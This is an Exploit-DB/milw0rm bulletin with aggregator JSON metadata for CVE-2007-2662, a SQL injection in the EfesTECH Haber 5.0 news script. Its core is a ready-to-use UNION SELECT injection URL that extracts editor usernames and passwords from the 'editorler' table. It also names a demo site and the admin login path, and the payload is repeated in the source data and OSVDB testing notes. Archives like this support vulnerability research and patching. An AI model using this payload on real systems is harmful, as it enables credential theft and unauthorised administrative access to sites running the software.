ID EDB-ID:3911
Type exploitdb
Reporter CyberGhost
Modified 2007-05-14T00:00:00
Description
EfesTECH Haber 5.0 (id) Remote SQL Injection Vulnerability. CVE-2007-2662. Webapps exploit for php platform
#Title: EfesTECH Haber v5,0 Remote SQL Injection Vulnerability
#Author: CyberGhost
#Demo Page: http://www.haberguvercini.com
#Script Page: http://aspindir.com/indir.asp?id=4899&sIslem=%DDndir
#Vuln.
#Username - Password:/?efestech=haber&id=-1+union+select+0,kulladi,2,3,sifre,5,6,7,8,9,0,1,2,3,4+from+editorler
#Admin Login : /editor
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR
And All TURKISH HACKERS !
# milw0rm.com [2007-05-14]
{"id": "EDB-ID:3911", "hash": "73656448c1575ef3ad8476a28d41da2d", "type": "exploitdb", "bulletinFamily": "exploit", "title": "EfesTECH Haber 5.0 id Remote SQL Injection Vulnerability", "description": "EfesTECH Haber 5.0 (id) Remote SQL Injection Vulnerability. CVE-2007-2662. Webapps exploit for php platform", "published": "2007-05-14T00:00:00", "modified": "2007-05-14T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3911/", "reporter": "CyberGhost", "references": [], "cvelist": ["CVE-2007-2662"], "lastseen": "2016-01-31T19:35:31", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-01-31T19:35:31"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2662"]}, {"type": "osvdb", "idList": ["OSVDB:36014"]}], "modified": "2016-01-31T19:35:31"}, "vulnersScore": 7.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3911/", "sourceData": "#Title: EfesTECH Haber v5,0 Remote SQL Injection Vulnerability\n#Author: CyberGhost\n#Demo Page: http://www.haberguvercini.com\n#Script Page: http://aspindir.com/indir.asp?id=4899&sIslem=%DDndir\n\n#Vuln.\n\n#Username - Password:/?efestech=haber&id=-1+union+select+0,kulladi,2,3,sifre,5,6,7,8,9,0,1,2,3,4+from+editorler\n#Admin Login : /editor\n====================================\nThanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR\n\nAnd All TURKISH HACKERS !\n\n# milw0rm.com [2007-05-14]\n", "osvdbidlist": ["36014"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in EfesTECH Haber 5.0 allows remote attackers to execute arbitrary SQL commands via the id parameter to the top-level URI.", "modified": "2017-10-11T01:32:00", "id": "CVE-2007-2662", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2662", "published": "2007-05-14T23:19:00", "title": "CVE-2007-2662", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Manual Testing Notes\n/?efestech=haber&id=-1+union+select+0,kulladi,2,3,sifre,5,6,7,8,9,0,1,2,3,4+from+editorler\n## References:\n[Secunia Advisory ID:25247](https://secuniaresearch.flexerasoftware.com/advisories/25247/)\nISS X-Force ID: 34272\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3911\n[CVE-2007-2662](https://vulners.com/cve/CVE-2007-2662)\nBugtraq ID: 23960\n", "modified": "2007-05-14T06:48:56", "published": "2007-05-14T06:48:56", "href": "https://vulners.com/osvdb/OSVDB:36014", "id": "OSVDB:36014", "title": "EfesTECH Haber default.asp id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
